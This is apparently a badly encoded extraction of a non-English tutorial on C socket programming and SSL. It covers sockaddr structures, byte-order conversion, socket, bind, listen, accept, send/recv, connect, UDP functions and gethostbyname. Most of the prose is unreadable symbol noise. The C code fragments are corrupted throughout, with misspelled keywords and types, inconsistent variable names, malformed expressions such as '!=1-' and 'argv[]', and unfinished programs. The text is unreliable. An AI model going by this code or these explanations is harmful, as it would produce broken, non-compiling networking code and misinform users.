^P _
?@
H)
5
-, 6 U )
"
5
6
1) ) +
B
2 `56) 60 6,
("c ?5 3
6C
_0 ,
^P
\
6,
\F
u $ "= G
`56)
?@
-
N
G
H
) i.
H
6-
" g@
•
L* •$-
N
\ 21
)
)
H- Y
a,<
L*
$^ P
= G C
8G'0
?5 3
.$
,!
`
-,
2
$% ' - < , 56
) 47 4h @
3
?@
G:H ( 5 ] 0
?5 3
"
6 u
" U4
H
P
"
N1
H
-
"
,
A
Int
A;
\ 2 )
^ P M 9 2 < IPh @
3
a "7
Struct Sokaddr {
Unigned Shortsa_family ; /*address family AF_xxxx*/
Char sa_data[14] ;
/*14 bytes of protocol address*/
};
2 G
& 2
/
R 1œ ' , 6 3
\ ,
6 #P<
d*
B
#) 4
)
TCP/IP % # ) 4
N
0,
#P< ;.
6
$
IP h @ $7
) 7) Y
0
< 5 -,6
! 5E
5
2G
[
3
-
3
& 2 Appletalk %Q
,6 3 7) Y
4h @"
,
B
#) 4
8G'0,
C
AF_INET
0
N
I
%L'2 %
d*
3 a sa-family …
-
) ) ) #P<
7) Y
0
\
2 a sa-data …
-
6, B'2
c
=
G
1
)
)
)Y = G 1
)
B
PH #
T G CH
a, N -
<
- *1 ( ,
Struct sockaddr_in {
'G `
6" ,
5<
/*address family*/
Shortint_family ;
Unsigned shortintsin_port ; /*port number*/
Structin addrsin_addr;
/*internet address*/
Unsigned charsin_zero[8];
/*same size as struct
Sockadda*/
#P<
),
2 G
-
3
d*
#
I
)
8! ?), $i.
d*
,! C
8
, 56a Sin_port …
[ ,
) ,B'2 a Sin_port …
) 47 4h @$
A 3 ,B'2 0,
%
3
< AF_INET
0,<
0, 5
B
P
H
2 < IP h @ a In_addr …
I
, , b '$, < , 6 3 = G
0
Y
,
,
B
#) 4
8
C
,
6 #P< ( 5
<= G
,
( Y
l'#
IP h @ C
8G'
h @ T 9 6 #P< "
-
62 a Sin_zero [†] …
6
?@ $,B'2
2
#P
<
N
#P
<
Y C 5 memset() % Q G 9
F) % 1 0, <
) -,< - Y T G 7
0,< - Y % H #P
<
3
1/
6
`
,
C5 / 1
)
0
<
$7) Y
B
#) 4(5
) 7 4h @
"
N62
'X
0
62 ,
0 <
" (,
6$+
3 ' ?
= G " - Y \ 5E
) , T G CH
1
)
N
B
P
H `
F •\ n : •
0
?@
3
-,< = G in_addr (
N
)
#
()
,6 3
, 5
H
#
@
/ ()
#
= G
0
"7
/*Internet IP address (a strcture for historical reason)*/
Struction_addr {
Usigned longs_addr ;
l '7
IP h @
?@ = G )
?@
9
0
2# 1) ,
B
P
H #
T/ 6
- Y
<)
5< - *1
I'/
5<
,6 3 6
a <
F
- 3• 3
2
1
6,/) S
< SL
"
LE \ "
<
6 ,
-
m.1"
G
< 78#
_-
< 7) Y <R
-,< n' DE 7
H) R1
S E! 5
6, B'
F)
LE \ ) BE \
H
#P
< )
c
,
,< - < )
, B'2
'G unsigned long
6" ,
7 5B "
I
1
)
0,< , 6 3 'G
)
%
$,
-, < = G c 7
%# ) 4
N
TCP/IP
S
LE
)
3
<
H) TQ ? !
0
3
Struct sockaddr_inas ;
As.sine_port=0 xb459 ;
" U4 R1
H A"
I _- P< CG:H )]
4
?@ " ,G )
<
- 3•T) A"
7 4 h @ TCP
"7
?
) 2 2'
H
a,< ,6 3
B4
59
)
+
, 6,
H
6, B'?)
,
'G % 1 2 56 0,<
a
S
) X
U
htons() a BE 1/
htonl() a BE 1/
ntohl() a 2 <
H) 2
) 2< \ ? N
#P
<U
ntohs() a 2 <
H
B
G' 1/ BE "
B
G' 1/ BE "
& ? !
"
) 7 5B % ,P +
7 5B % ,P +
) 7 5B % ,P +
7 5B % ,P +
, ,
A
SL
"
)
F- Y
6, B'
2<
?
3
("c U
LE 7
H " %PH C
5 /?
0, - Y l '+
IP
TCP
,
I
,B'C
<
- Y l '+
sin_family , B' sock_addr_in `
-, < = G % !
l '+
"
<@ l '+
,B'2 )
"
H) b'a R
T Q? !
< I
H
("c , B'2
6
,
- Y
<
6 3
[
AF_INET
,
R 1$, < ,6 * %
1Q
#P
< ) )
0
5 - Y
a
6, B'
IP
S1H
@
<
h @ ,B'?)
IP h @ I 78#
,
IP
•2
6h @ ;.P
a, <
<
6-
pwwžwwžw‹qžw{p
,! IP h @ ,B' sock_addr_in `
IP
3
@O L
F "+ ) 2
1/
4 long \ " ,!
<
a
‹‹žwwžwpwžw†} ( '
, B' BE S1H
<
,!
% ,P
R1l '
+ 2 a inet_addro() + …
U4 )
< h @ c TQ
0
h @
7
L
G ,6
B
P
H + % 5! U#! + 2 ainet_ntoa() + …
(E
IP h @
<
) struct in_addr \ " l '+
H 9
7 L
) )
4 0, 5
a " TQ
BE S1H
@) '
% ,P $0
= G
:
< \ ?@ F) 3
printf (%s , inet_noet_ntoa (ina.sin_addr) ) ;
k
F) 3 ) -
G
)
:
< 7 L h @
a
"( '
. l 'TQ
F) 3 C
8Q 0,< ,6 3
wqžŠžw‹wžwsq
IP h @
www.ibm.com ( ' -" /
)=
("c +
G
,
?@ " % P
H0
@ % ,P N N
@
*
6 3iX
b.
0, < = G ^ P
_ TCP
P] -, 6 U )
H
- Y
+
Socket() +
a
"7
+
B( '
#include <sys/type.h>
#include <sys/socket.h>
intsocket ( intdomain,int type,int protocol ) ;
- <C
8PH
.
I AF_inet
0 <
\ ,
,
,
,
(8!
Type , B'
?@
,
3 -, 6 ?
[ ,
$
? 6 *1
#P
<U
\
\
0,< (
\ "
H sock_stream
) 6,
I
? I
%# ) 4
0
#P< .
,6
56
H(
#P< 6
) T)
6, B'
0
–, G +
?@ "
"
R 1_% '
,
0
Ÿ
+ 2
N
<- Y ,
,N
H
,
F) 3 C5 / , YD U
+ 256 F) 3
:3 - 5 < error
"
? G 5 <)
,< , 6 3 'G
+
,
,
+
:3 - 5< A"
<
7 B
5!
u ,< …w , socket() +
Perror() 5
56
5 3^P
' %5! ,< …w socket() +
, ) ) - P& @
,
[
- < % Q C H ] ,< ,6 3 - Y
0 <
=H
,6 3
?56socket() + b
L*
L*
a Protocol …
< - 5< ,B'2
Y ?@ ,
[
I Sock_DGRAM
0,
,
,<
a type …
42
\ ? 6 *1
3(
4 2 a domain …
6
,
4
0,<
H)
-
5
)
, = G
"
+ )
u ) 2 0
-, @ 1Q
?@
# A)
0,
6
a Bind() +
^P
y
b'5<
bind() + 0
h @?
-,
P
0, 5
6
a,
H
(5
,
,6
- 5< , <
"-
0, 5
= G
5
c 5G
C
•-,< "
7 4
(
c 5 / = G2
C
U4
" Bind() + n 9 "
W 3 7 4 - 5< ^ P
http %# ) 4
TCP
)
A"
H)
ˆ 6" 6 1
), -
j6 3 % !
†q 7 4
B
. 2<
% !
G -, 6 U )
5
A
5<
1P
B
5!• ,
,6 5<
G2
"
( E 6-
F
) UDP TCP
/
<
6
4)
6X
Y
2 `56
H) TQ ? G
( 5 $-, 6 U )
% .$
†q
@ ,L
" 7 L bind() +
a
7 4
B( '
#include<svs/type.h>
#include<svs/sock.h>
int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen )
0, -
" socket_] + " - Y
0, 6,
B
.
P " h @
L*
-,< "
5< , 6 3
< IPh @ ) 7 4 h @ $
-
3
% !
@)-
- N@
O*
0
S /
=:1"
13
@
< I
Y
' L - 5<
My_Addr `
- <
,
7
$ •ŠŠsŠ
5<
F)
4 h @ , B'
2
3
0
3
T 9 a Addr_len …
# Bind_] +
U#
wqp‹ - 5< " 7 4
0,
/
a My_Addr …
`
0,< = G C
8P
H `
a
?56a sockfd …
8P
C
H
I
b . _= 1
@2
- 5< ? !
2
, < wqps
-, < ) "
#
Y 2
6-, 6 U )
0
,6 * ?
?@
)z *
)
4 , P 5<
,
_O
6-, 6 U )
6
I INADDR_ANY
$,
, &
4 - 5<
4 2 " -" F % !
IP h @ , B'
[ ,
IP h @
5< B
. 2<
)
U#
37
b.
% !
0
c
6, B' 6
?@ ,
% ,P BE 1/
1/
Y
,
1/ ) ,
Y
N-
3 ?@
?@ HTONS_] +
, )
6a
-
) "
3
5 <" % P
H
"
' Bind_] % 5! - N@ , < u $ :3 \ A"
0,
4
,
#
("c
2
"
4 5<
?@
5<
G
, % ,P
3
,6 3 "
H
#_
O*
Bind_]
0
,6 3
-
?@ % 1 0,<
N
- N@
2#5
0
-
_z
…w ,
_-
G ,<
) - P& @
PEAAOR_] + ) :3 - 5< Errno
:3 7 L*
a Listen_]+
(8! -
^P
% !
+ 2 b
TCP ^ P
6X
0
),
7 P!
_+
N I )-
=
I.1 $-, 6 U )
, 6, 7
4h @
+ b
0,6,
G] , G
? I
R
H 6U)
) " ) T G'7 9P
@"
=
a
"7
% !
,
(8!
) -
<
7 4 - 5<
H
X
,
Q ,/
@)- 5
,G Q,/
6X
I.12 "
", - " U4
TCP ^ P
@^P )$
b'+ 2
TCP ^ P
0
F? "
2,
A)
G -, 6 U )
2#5
? " 6 9
F
7) Y
) 4
, , ,
% !
2
H
B
/
#
< (8! % !
+
#@
,
Listen_]
B ( '0,< W 3 7 4 - 5<
Int listen (int sockfd , int back log ) ;
0, -
E
?@ ,
L*
?56a Sockfd …
5
"
0 I -, < =
0
erno u )
,G Q ,/ a Backlog …
) nB
G 7 9P
, 6 3 …w+ 2
,
backlog ,
-,< ),. pq
:3 ")
7
B
P
H+
0,<
- ,3
, 56
:3 - 5<
Accept +
a < H ?@ ( Y
-
<
)
_] +
) 4 TCP ^ P
6
H) 0 <
2 "
,
M 9
7 B
5!
, PB
:
+ b
% !
>/
/
@)L*
T)
L*
F accept
accept()
0,<
0,6,
% 1 2 56 ,6, ( E
5< E
()
L*
nB
G 7 9P "
I
-,< =
- Y nB
G 7 9P "
7 9P %
-,< =
("c
0,
, accept()
) -, @
2 7) Y 0
# A R4
T)
L*
2
) 7 !89 T
0,<
6X
2
€
- Y
] )
# -,< =
, ,F
accept() +
, " U4
<
O*
% !
0,
, + 2
$ ' R4 _ F) 7
# nB
G 7 9P 2 " ,
, ,F
5<
"
,< F listen_] +
X
" 5<
) 4 7 L*
@)-
I
< - N nB
G ) -,< =
X
% .%
),
)
'
7 9P "
" _=1
/
()
" _O
# L*
a
0,
2 0,
"7
+
B( '
#include <sys/socket.h>
int accept ( int sockfd , void*addr , *addrlen ) ;
0
T
Socket _] +
-, @
+ 2
M 9 IP h @ ) 7
4? !
2
L*
@ 5<
4 h @ nB
G^P
0,< 'G C
8P
H #
,
3
- < a Addr …
`
A R4 " U4 % !
0,
5<
S / addr
a Sockfd …
?@
`
,
^P %
T 9 a Addrlen …
H- Y
u
,G
1)
:3 ?@ - 5 <
a
L*
-
Ÿ
+ 2
,
:3 , < _…w]
,
0
% H errno
,6 3 ,
B ?,< 2<)
0
"(5
TQ
#include <string.h>
include <sys/type.h>
#include <sys/type.h>
#Define Myport 3490 /* the port user will be connecting to */
# define BACKLOG 10/*how many pending connections will hold*/
main()
{
int sockfd, new_fd;/* listen on sock_fd, new connection on new_fd*/
struct sockaddr_in my_addr;/* connector’s address information*/
if (( sockdf=socket(AF_INET,SOCK_STREAM,.)!= NULL){
my_addr.sin_family=AF_INET;/*host byte order*/
my_addr.sin_addr.s_addr= INADDR_ANY;/*auto-fill with my IP*/
bzero (&(my_addr.sin_zero),8) /*zero the, rest of the struct*/
if
(bind
(sockfd,(struct
sockaddr*)&my_addr,
sizeof
(struct
sockaddr))!=1-){
listen (sockfd, BACKLOG);
sin_size=sizeof (struct sockaddr_in);
new_fd= accept (sockfd, & their_ addr,&sin_size);
, ,F
"
60,
'
- Y $
T
,
N
accept()+ b
N
?@ L *
recv()) send() +
)-
- Y % H
5
a
) -, 6 U )
"7
+ )
5
+ ) 2
B ( '0,
6-
1P
Int Send (int sock fd, const void_msg, int len, int flags);
Int recv(int sockfd,void_buf, int len, unsigned int flags);
0
-,< z *
E@ "
accept() + "
-, @
1
60, <
_ `
T
0
Y ?@
b' 6
B
. a Msg …
@ %Q] I'/
H TCP
) '
S /
'
2
;.
5 iX
a Sockfd …
L*
" -
1
,B'?)
)
T 9 a Len …
6-
a Flag …
, `4 " & 6 4
0, RN
'
6-
B
. h @ recv() +
I'/
0
7
1
)
0,
, 6 3 …w :3
d*
X
S /
len
u
6")
'
,G
-,
"
) '
7
1
'
4 2 a Buf …
H E@
+ ) 2
6
,
,G $ PQ ,!
1
,G
2#5
,
H
0,<P? # , +
,
H wqqq , len
1
), -
] 1
6-
%
"
†qq 7
0, d *
5< ,
2
@=B
# ,
send() + b
T /, # T
u
6-
e 'TQ ? !
0, < pqq
5<
-,
-,
E/ ,
H _ '
G B
/
6 a
0,<
\
? 6-
6
)
A /)
b 'recv() ) send() + a #
' )T
) UDP A)
(
B
, 63
1
)
œ,
P
, ,
T
shutdown()) close() +
, 5
'
T
-
0, , P
) < N"
^P ,
^P
,< M 9 ? "
,
, < "
"
? " 6 B', 562# 1
)
a
close()+
"7
B( '
close (int sockfd) ;
+
L*
+ b
,<
? 56
sockdf
L*
0,< ,6 3
- Y % H
'
2 0 I
&
)T
a Socfd …
L*
,
H 0
accept()
-,
socket()
I ) nB
G 7 9P ( 5
N
close() + b
<
9P
0
% !
7 9P =
a
TCP 7 9P "
),
A"
4
$-
#
TP
H
/
,,P
N ^P
-
X
6
?@
F ,
0,
'X nB
G
?@ B ( ' ,<P shutdown() +
"7
,6 *
2
N -
Int shutdown (int sockdf, int how);
0 I
a
" ? `56$-
R4
" ,
T
1
) "
0,
6-
"@
'
"@
8
C
g
-
' a Y
) ) '% !
2#5
g
-
2#5
g
'
, 6 3 …w +
2
,
0,
_TCP %# ) 4
.
a,
-, 6 U )
H- Y
5
,
G
A"
:3 ")
4
0
aw , …
0
" ? `56
)T
ap , …
%5! close() +
0, 5
u )
, …
T
F) 3 ' % !
-
A) a How …
2
^
"
^
, 56 1/ 2 0 <
#
2#5
?@
1/
0,
"
a Sockfd …
L*
7
B
P
H+
, 56
:3 - 5< errno
P]
- Y
4+
, , < 'G
5
P,
+
G
T/ 0, <
E
- Y
+ "
#
0, )
+ 2
F)
-, 6 U )
) Yˆ 6 E
0,
Y -, 6 U )
<
5
connect() + b
(E
,
F)
5
- Y
6-
^P
H
%5! 2
< ' R4 X
'
0, , Pshutdown ()
socked_]
X
-, 6 U )
C
5
"
2
0,< ,6 3 0,
CH , _=1
- Y ,< 'G B
P
H j*
0
?@ ) ,
,
( N6
_O
, < I
,H
iX
recv() ) send() +
)T
close () + b
5
" _z
-,< E ^ P C
_
connect +
)
<
listen () +
0
connect () + " -, 6 U )
- Y
) ,< -,< F I
,6 3 & @
' +
2<
^P
) -, 6 U )
E - N@ , < -,<
a
H
accept () )
3 '
connect () +
"7
B( '
#include <sys/types.h>
#include <sys/socket.h>
int connect (int socket, struct sockadr* serv_ addr, int addrleny);
0
Socket() +
-, @
`
2
3 '
Sockdf \ "
0, < 'G C
8PH
0,< ,6 3 2 G ,L
/
?
),
#B,
- 5 <2
%L
,
? !
h @%
5<
5
S /
I
),
0,
?
O*
5<
-, 6 U )
/
(8! %
`
a Serv_addr …
0
2< IP h @
-" , : Addrlen …
B
P
H `
H sizeof(struct sockaddr)
-, 6 U )
4 h @ ? 56
a SOCKDF …
7 4 h @ ) ,L
'G
0
% !
L*
3 7 4 h @ 5<
5<
,
42
H
# 2
' L 7 4 - 5<
H)
v 4
,
8
C
R4
X
3
9
5
2 -, 6 U )
), <
-
O*
% !
,6 3
M 9
&
3 7 4 h @ $^ P -,
\) <
^P ,
,< d *
)
[,
C
G:H -, 6 U )
7 4
0, 5 \) <
, 6 3 …w + 2
TCP ^ P
,
0,<
H
-
:3 - 5< errno
Ÿ
UDP A)
a(
,
,
(E (
T /0
\
A R4 )
) UDP A)
\
' (,! 7
'
u )
'
'
)T
)T
$T
+
?
7
0
-, 6 U )
socket () +
4
3 '
2 0,
E (
5
…
\ "
_=1
0 < ( E SOCK_DGAM
_ bind() +
'
-
]0, 6,
GH
h @] š
,P
P
]0,
? I
6-
7 4 h @ -,< E
'
I ,
'X
h @ ,< A"
4) '
-
0
,6 3
R4 ?# T
0 < ( E sendto()) recvfrom()+
B
_O
ˆ 6?), _z
H) _,6 5
(
GT
) -,< d * _7 4 )IP
\
'
0, , P
)T
-,< E
C
_
5
4 ) socket
4) socket() +
] 0,
E (
…
\ "
_=1
_ SOCK_ DGRAM]
0, 5 T
-, 6 U )
, 6, 5
)T
5
G 6-
0, 5 T
? 6'
-
$, <
#
<,
N ,
'X
1
ˆ6?), ,< "
-, 6 U )
"
0, , P
"7
(
5
P-
5<
"
'
-,< E
T
6_O
# H)
-, < 3 < -, 6 U )
0, 6, ( E
a
-
+
_z
B( '
Int send to (int sockfd, connect void* msg, int len, unsigled int flags,
const struct_to, int tolen);
0
z *
F socket() +
-, @
E@ "
1
6-
(
2
0
-, 6 U )
Y
d*
3
7
?@
H UDP
) '
0
0, N I
H %. h @ a Msg …
I'/ ( 4 2 '
0 <T
S /
?@ C
8G'$;.
?)
4 - 5 < 2 `56) , L
a Flags …
, ` 4 " &6 4
2<
a TO …
`
IP h @ ,
^
) -,<
( 4 T 9 a Len …
1
Sockaddr \ "
8PH
C
a sockfd …
L*
`
0 < I
size
,
sockaddr `
?@ ,
I of (struct sockaddr)
0
T
,G send() + , 56+ 2
n' % !
,
,
2
:3 , < _…w]
# -,< T
6
T
,
,G , 6X
,
errno
# 6" 0, 5
0,<
B
/
")
B1
T 9 a Tolen …
H 0
u
@T
2 `56) -
"7
-,< ?@
:3 - 5<
X
,G
3
2 C
5/
0, N I
a
,
(
P-
B
'
+
&
B( '
Int recv from (int sockfd, void buf, int len, unsigned int flags, struct
sockaddr_ from, int_ from len );
0
,6 3
-, @
H %. ?@
F socket () +
'
6-
(
% !
L*
I'/ "
a Sockfd …
B
. h @ a Buf …
0
_
S / ]
< '
,
4 T 9 a Len …
) ,<
?@
3
5<
) I ,P
socaddr \ "
`
a From …
7 4 h @ ) IP h @ 7 L*
?@ % !
8PH
C
0,
0,
0
A"
4
-,
I
?@ % !
42 0
-,< '
Y
?@ a Flag …
`
T 9 a Len …
,G & + 2
0
/
56
,
'
a #P
<
#P<
,
0
63i
6 6
N +
@2 5
"
, Y+
-,< 'G 5
3
6-
0,
+
6, @
"
g
),Y
a getpeename() +
include<sys/socket.h>
int getpeername(int sockfd, struct sockaddr_addr, int_addrlen);
) 47
4 h @ ) IP h @ % < $%
-, < = G % •7
+ 2
M 9
6
6,
+ 2 " - Y
4 0, 5 z *
^P %
M 9
a
I
2 0
-,< = G ?@
0,< ,6 3 4 %
3
8P
C
H
sockdaddr \ "
M 9 7 4 h @ ) IP h @
% !
.sockaddr
u
)
, 6 3 _…w]
,
`
l '+
n 9"
@ C5 / ,
?@ ,
A
'U
LE \ " 5 < 2 <
0,
: Sockdf …
`
a Addr …
b
`
T 9 a Addrlen …
' (, ! 7
:3 - 5< errno
0,< ,6 3 I :3 \
h @ ) IP h @ S
L*
2#5
)
% ,P ,< - < ?@
#
BE 7
7 4
Š j*
G
gethostname () +
( 2 $,
,6 3
$ <
F ?@ )
_ www.ibm.com C
8Q) ?@ IP h @
5<
< ( + 2
2< 2 5 (
a
TG
<
"7
+
B( '
#include <unistd.h>
int gethostname(char *hostname, size_ );
U4
_
<
7 P
!
] 6
"
0,< ,6 3 - 3• E @
0
:3 - 5 < % P
H , 56errno
0
2
, )-
")
,6 3 Y
-, 6 U )
-" / (
,
G 0, 5
) ,L
a
b.
3
E
< E
,
)#
K
1Q
- Y ?@ IP h @ " C
5
e '2# 1) ,
h @? !
N
8P
C
H
X
N56
,
1
)
#B
5! " 9 ) DNS
5F
H
5<
,
DNS
@ 5F
0,< ;. ?@
^P
< T 9 a Size …
, , %5! l '+
'?@ H) E
" "
:3 ,< _…w]
0, 5 - Y
W 3 2<
2< ( +
S /
a -" /
-,
a Hostname …
@
-, 6 U )
" B( '
-" / ( h @ ,
,@
2
#include <netdb.h>
struct hosten * gethostbyname(const char * name);
0-, 6 U )
7
?@
3
hostent \ "
< a Name …
-" / (
`
h @ $+
a
,
-,< = G "
Struct hostent
Char *h_name
Char *_name
Char **h_aliases
Length ; ¡Int h
Char
**h_addr_list;
};
8Q
C
, 6 3 -" / (
< 2
#P<
] 2<
( a Hname …
5
_www.ibm.com
_ <
,
, B'2
#P<
3 wq
< 2 ] 2<
, <- <
( a H_aliases …
G
3 a H_addrtype …
N 56] h @ -
_0 < ,6 3 AF_INTEL
S / h @ T 9 a H_Length …
-, 6 U )
2<
^
IP h @ ?@
0 <
,
`
),
`
I errno
<
0,
- <
u
$?
&@
- <
B
PH +
M83
)
$?
u
0 <
'
:3 \ =
‰9
< 2 0
c +
&@
' 7
2
NULL , 7
herror
5
) X TQ
3 |q
' 7
,6 3
I
I
H _ addr_list…
<
u ?@
H
g
)
2
g
+ 25X
F) + 2
H
,
F ) ,< ,6 *
herror() 5
a,
H
)
+'
"
F)
#include <stdio.h>
#include <stdio.h>
#includer < errno.h>
#hnclude <netdb.h>
#include <sys/types.h>
#int main (int argc, char * argv[])
{
struct hosten * h;
if(argc!=2){/*error check the command line*/
fprintf (stderr,”usage: getip address\n”);
exit(1);
}
if(h=gethostbyname(argv[]))==NULL){/*get the host info*/
herro(“gethostbyname****_;
exite(1);
}
printf(**** host name :%s\n”,h-h_name);
printf(“IP Address :%n”, inet_ntoa(*((struct in _ addr * )h-h addr)));
return.;
}
E )-
'
) )? !
0,
k
F) 3 )
'b3 )
(
' Enter , B) <
) IP h @
7 L*
a
?
getip
-" / ( h @
7
2 (
?@ 5F
" A" c
" 7#
2, l '
9_=1
13 B '
-" / (
B
F
U
)-
Œ
aTQ 0, 6
$getip www. Ibm . com
,
IP
+H ) h-addr-list u
6)
@
#P<
, -, < - 3•BE 7
( Y
:
' -
<
L
1
)
<
?@ T)
1/
F) 3 ) k
T G IPh @_O
-" / ( h @
3 |q ,
<
b '5 < ,
h @ % ,P
7
6
l'
8G'
C
0, , "
inet_ntoa() + " _pws 0w{q 0w†}žw‹q C
8Q]
0
in_ \ " `
P
E 2
?@
0
) )?
@ inet_ntoa() +
) ,< = G ?@
3
-,<
•\ nP
: • %5!_z
%L' ,
addr
5
3 lY %5!
1
)
2 5>
) )
4
"
•\ nP: • %5!
0, '
Q $X
SSL g(
[Secure Socket LayerZ
a – N&
5
3 6
T
F 2 7 !89 T P
'9
6,
) 6-
0, , < / 9 78#
2
"
-,5! %#
5 $ 6-
N
?,< nK'
"
. " ,
N&
P
! 78#
2 0,
'
P
! -,5!
N& …
?
6? # )
" ,
6
& , B)
,B
,
F )
, ,F
0
6
6
( ?
21
) 0,
) )
?@ c
!
0
* & (
) "
N & A) )
6 P. % H 6 ) "
?@ () %#
F
N& …
N & , B?
, B T P A) 2 %#
7
2 T
%#
0, <
- 4 1
g CP
6(
6
P . m.1
&
3 b' ,
F ?@
-
0,
F
A) 2
F
j
& " 0,<
&
A
L3 , B
) M 9 " ( u4
,
Gœ
L3 , B)
#
& ) -,< B
),
, < 2t5:
F
N& … %#<
N& A)
6-
.
!89 , 6 * ? N
'
n 9
@ ? )@
5! , B " ? N ) , & A
? 59 ?
6?
<& , B ) 2 "
,
T
3
, B)
N,56 ) "
N ,B ,B
5! , B
)
bP
1
< 6 V
?
5! , B
) -,
N & A) )
?
,
,
6 #P
<
<) 0-,
a" ,
–
0
2#5
L3 , B 0 <
2
5! , B
?@ , Z>
- Y ( u4 ? "
5! , B n P
: A) 2
0 <
?@ , * ,
u4 ,6 *
?@ D
B %#
A
0
,B 3
" %#
2 %/
x
0
5! , B k
F
%
/
0,< \,
?
5!
N& …p %#<
N
% H"E g
6
'L ?
E/ ?
F b
,B
&
5! , B
-,< T, )
1
, B" - Y
!
'L ?
,
-,
m .1 ?
, B 0,
0 <
-
U
),
7 !89 % ?@ " - Y
?@ N
7 !89 ? & n 9 "
,
&
7 !89
N
6
H- Y
. …
. "
I
. 0,<P '
N1, @
7 !89 • &
'7 !89 - 56)
'L ?
<
&
-,
, B 0A
L3
0,
&
6-
5 0
%
/ -,
-, < T
'
$7) Y
7
L3 , B %
? "@
-,
Hash
5
6-
,
,
'
&
0 <
-
1E
,4),
> 0
' B ( u4 - 56
5 …
5 "
L3 _ 1 E
( u4 ) ?
?
6( u4 Hash
/? & ) 1
?@ Hash +
6 u4
m .1 , < ? # Hash
L3 , B
? 56
6
2#5
I
,
P.
> ]
<
7) Y Hash
g
P .
-,
'
> U
7
),
O /
$,
6
( u4 Hash
'
) 2 ),
,
'
" -,
'
0 <
6-
5
5!, B
1E
" / 6-
5
)
F ) ( 4 n,L …
?@ b
6
L3 , B
L.
P! ?& )
<
, h
F n,L
F n, L
0
@
F
? "@" - Y
,
,
1E
6
b
F 6
Q
1/
<
$ <
( E
P! 5B )
6
5! , B
bP
( u4 n, L 0
6
- Y -, <
(E 9
,#
c 5G %5!
C
0
6-
<
( E
6-
™Y/ 6-
4
•A) ) S
n, L ( u4 , P
0
F
L3 , B 2< ?@ h
5 ) ( u4 n, L +H )
A"
F n,L
d*
, ,F -
()&B) ("c 6)
#1 " ? 59 ?& h
5
5
5 0, N,#
, A" ( u4 ,P n,L
6
0
-, !
6
5! , B] ,
6
T.
6
?
v ')
3
U)
?
2 4 i:
N
1P 0, <
60,
b
0
2
6
3 = D) ,
6
2 " M, 6, 6 % #
S
, $?
@
6
- E"
U)
6
?@
U)
) _= B*
6
U)
0,<
5 ™Y/ 2 X
YD)
6
%3
6
U)
F
6
,
?@ -,
6
U)
6
S
BB S
"
U)
F
2 0_, ,
6
U)
- 4]
…
A
W L*
2
),
-
,
P
G< 2 3@ " 6
6
> )( % <
6
> 0 <
Z> A 3
a SSL %•) 4
H- Y
#P< )
TCP/IP % # ) 4
c
c
6-
TCP/IP %# ) 4
)T
HTTP) LDAP) IMAP ,
6% # ) 4 )
0, <
F
SSL %# ) 4 …‹ %#<
c" c )
3
6
c"
,6
-" F SSL
BH
<
-,6
l '%#<
!89 ) , 5
E
,
)
F
N& 2 T L
SSL
U)
U)
M 9)
5! , B ) 6
%
BH 2 a SSL -, 6 U )
&'(
P! "
0, 5 %
5! , B
,6
-" F
-,<, 7
67 P
[ …
/ ? 59 )
N&
T
U)
a,
?# 2
9 ?56
SSL 0, @
)
R 4 ? # & % 5! 2 U #!] , 5 7 P
[ SSL
2 `56œ_
?
2 4 SSL
,
6"
,6
# " - Y
$ )
6
),
&
,
,
0
U)
6
,6
H
2 `560, 5 %
3 5! % H 6
),
BH 2 a SSL
-" F )
/ ? 59
&
1
U)
67 P[
0, 5 ,
,6
-" F
U)
) )
&'(
BH 2 a SSL 2 TL
)
0, 5 1P -,< & 7
) SSL Record protocol a
= G
6-
SSL
( u4 1P
$ 6( u4 2
%# ) 4 protocol SSL Handshake
% # ) 4 " - Y - . & SSL
1P " M, 60, 5
SSL
= G
9 P %# ) 4 0,
)
)
U)
a
0
?@ M 9 )
6
9
)
!89
K
&F % # ) 4 ) " SSL % # ) 4
-, < % #
'SSL
T
?
)
U)
" M ,6
U)
b
6
)
67 P
[
N&
N1O *
0,
_
3] )
U)
<,B
5! , B
,
- Y
U)
< , B)
5! , B
N& %
" g@ SSL Handshake ( u4
5! , B " - Y
<,B 3
( u4
&
U)
SSL
-" F )
B
F
6
)
N & TL
N& "
0,<
A 3
G F " ? 59 ) 6)
5! , B
G
U)
U
& $ 6-
? )@
67 P[ % < ,
9P %# ) 4
P
SSL % # ) 4
<,B
K
,6, -" F )
E
SSL
$
0,6
67 P
[
N& " - Y
SSL -,<
0, 5
P 4
N&
2t
5:
6
%# ) 4 " '2 0
œ, 5 7 P
[
U)
&
" '2 0
, B 2 0,6
H- Y
0,<
a, -,< - )@
"
83
9
%/
2
'L
-
T
$&
"
SSL *
N1- Y
SSL ^ P
U)
- 5< )
)
U)
!89 N ) -,<, 1
0, 5
U)
3 6
U)
6
3
)
-)8!
,< Y T) B
/
,<
U)
!89 &
6,
"
0, 5
0,
)
6-, < T
N& T L
E ?#
)
,
b
T
T
&
!89 " - Y
(8!
,
U)
7P
[ )
6
0, 5
0
'
N1
( ')
F
)@
& ) -,< 1P T.
&
)
6-
5! , B
E
T
)
0, 5
,B
-)8!
0,
U)
T
6,
g
- Y
U)
)
G
œ,
,< 3 6
)
,< -
5 3 TL
1
)
,
. ,B
&
F)
U)
1
)
. ,B
?@ -,< &
67 P[
3
)
- 56 -,< Z> ( u4
U)
,
" - Y
?@ ) -
)
1
)
67 P
[
.
3
U)
6
A 3
L3 , B " )
)
0, 5
U)
7
2
0, 5
, 5
,1
1P SSL
?
?@ " - Y
? 59 T
T9
B
F, B 1
)
. , B" - Y
T9
!89 0,<
B
F
2 `56œ <
( u4
. 2'
& )
u"
U)
?
) )
)
<,B
N& , B 2 " - Y
G -,< 1P 7 !89
0
B
F, B B )
T
6( u4
,6
\89 )
9 P " '2' ? 4
-, < &
u4 B )
( u4
U
G F"
%
/
U)
œ,<, 6 3 &
0, 5
0,<
9P " '2 ' ? 4
,
'
u4
U)
& )
U)
0
SSL
-,< <R V <
G F " ? 59 )
B
F , B ) -,
& $? )@
SSL
(5
&
B
F, B 2 " )
0, 5
6,
2
G
g
)
$,
- Y
,< -
U)
5 3 TL
,
. ,B
&
1
)
9P " '
- Y
67 P[
U)
6
A 3
)
3
6-
)
0, 5
U)
L3 , B " )
7
0, 5
, 5
,1
B
F, B 1
)
1P SSL
" ?
B
F
?@ " - Y
? 59 T
T9
. , B" - Y
T9
!89 0,<
2 `56a <
( u4
U)
?
N& )
. 2'
u"
) )
)
<,B
N& , B 2 " - Y
G -, < 1P 7 !89
GF
0
B
F, B B
0, 5
T
0,<
U)
6( u4
,6
\89 )
9P " '2' ? 4
0
,
SSL
-, < <R V <
G F " ? 59 )
&
u4 B )
-,< & ( u4
9P " '2' ? 4
$? )@
'
